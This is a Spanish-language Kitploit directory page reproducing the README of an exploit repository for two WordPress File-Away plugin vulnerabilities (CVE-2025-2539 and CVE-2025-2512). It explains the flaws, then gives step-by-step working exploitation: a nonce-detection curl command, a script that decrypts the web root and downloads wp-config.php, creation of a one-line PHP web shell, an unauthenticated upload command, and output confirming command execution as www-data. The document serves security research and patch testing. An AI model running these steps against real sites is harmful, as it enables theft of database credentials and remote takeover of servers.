Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
Herramientas/GitHubGitHub/whattheslime/file-away-exploit
ReconocimientoAnálisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebRecopilación de InformaciónSeguridad WebPruebas de PenetraciónDesarrollo de Payloads
GitHubwhattheslime/file-away-exploit

file-away-exploit

Scripts de explotación de ejecución remota de código para el plugin File-Away de WordPress (CVE-2025-2512 y CVE-2025-2539)

Ver Repositorio
hace 1 añoAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
file-away-exploit — Scripts de explotación de ejecución remota de código para el plugin File-Away de WordPress (CVE-2025-2512 y CVE-2025-2539) | Kitploit
Sitio web
Compartir

Exploit de File-Away (CVE-2025-2539 y CVE-2025-2512)

📌 Propósito

Este repositorio contiene los detalles de las vulnerabilidades y los scripts descubiertos en File-Away, un plugin de WordPress utilizado para la gestión de archivos.

Este plugin contiene dos vulnerabilidades que pueden conducir a la ejecución remota de código (Probado en File-Away 3.9.9.0.1):

  • CVE-2025-2539: Lectura arbitraria de archivos sin autenticación
  • CVE-2025-2512: Subida arbitraria de archivos sin autenticación

📖 Lectura arbitraria de archivos sin autenticación

El plugin File-Away para WordPress es vulnerable a la lectura arbitraria de archivos sin autenticación en todas las versiones hasta la 3.9.9.0.1 inclusive.

Esta vulnerabilidad existe debido a dos problemas: la falta de verificación de autenticación en la función lib/cls/class.fileaway_stats.php:file_away_stats->ajax() y el uso de un algoritmo de cifrado débil en la función lib/cls/class.fileaway_encrypted.php:fileaway_encrypted->encrypt().

Esto permite a atacantes no autenticados leer archivos arbitrarios, incluido el archivo de configuración de WordPress (wp-config.php).

📁 Subida arbitraria de archivos sin autenticación

El plugin File-Away para WordPress es vulnerable a la subida arbitraria de archivos sin autenticación en todas las versiones hasta la 3.9.9.0.1 inclusive.

Esta vulnerabilidad existe debido a dos problemas: la falta de verificación de autenticación y la deficiente verificación del tipo de archivo, ambos en la función lib/cls/class.fileaway_management.php:fileaway_management->upload().

Esto permite a atacantes no autenticados subir archivos arbitrarios que pueden conducir a la ejecución de código.

🔍 Detección

Si el plugin file-away está instalado y habilitado en la instancia de WordPress objetivo, el nonce fileaway_stats debería estar presente en la página de inicio:

root@kitploit:~
curl -sk http://127.0.0.1:8000/ | grep -E '^var fileaway_stats.*nonce\":\"([a-f0-9]+)\"};$'
root@kitploit:~
var fileaway_stats = {"ajaxurl":"http:\/\/127.0.0.1:8000\/wp-admin\/admin-ajax.php","nonce":"ff57064c96"};

🐞 Pasos de explotación

  1. Instala los requisitos de python:

    root@kitploit:~
    python3 -m venv venv && venv/bin/pip install httpx
    
  2. Utiliza la vulnerabilidad de lectura arbitraria de archivos para obtener el archivo de configuración de la instancia de WordPress (wp-config.php):

    root@kitploit:~
    venv/bin/python3 get_config.py -t http://127.0.0.1:8000
    
    root@kitploit:~
    [+] File-Away nonce:          ff57064c96
    [-] Encrypted web root:       LcZh3iec7c3vfHRt2C8=
    [-] Decoder:                  .i%B7%1Dy%F8%21%8A9%25%9Az%29%AA%BB-%BA%FC1%CB%3D5%DB~9%EB%BF%3D
    [-] Charset:                  abcdefghijklmnopqrstuvwxyz0123456789
    [+] Encryption Key:           f2379aghijklmnopqrstuvwxyz65bc410d8e
    [+] Decrypted web root:       /var/www/html
    [+] Config file downloaded:   127.0.0.1:8000_wp-config.php
    
  3. Crea un archivo PHP para subir:

    root@kitploit:~
    echo '<?php system("id"); ?>' > /tmp/exec.php
    
  4. Utiliza la para subir el archivo al servidor:

Descargar herramienta
vulnerabilidad de subida arbitraria de archivos
PHP
root@kitploit:~
venv/bin/python3 file_upload.py -t http://127.0.0.1:8000 -c 127.0.0.1:8000_wp-config.php -w /var/www/html/ -f /tmp/exec.php
root@kitploit:~
[-] nonce:            4810861b18
[-] upload_nonce:     0c3f44ae83
[-] loc_nonce:        a17a2df989
[+] File uploaded:    http://127.0.0.1:8000/wp-content/exec.php

⚠️ El archivo se sube al directorio wp-content por defecto ⚠️

  • Accede al archivo PHP subido:

    root@kitploit:~
    curl -sk http://127.0.0.1:8000/wp-content/exec.php
    
    root@kitploit:~
    uid=33(www-data) gid=33(www-data) groups=33(www-data)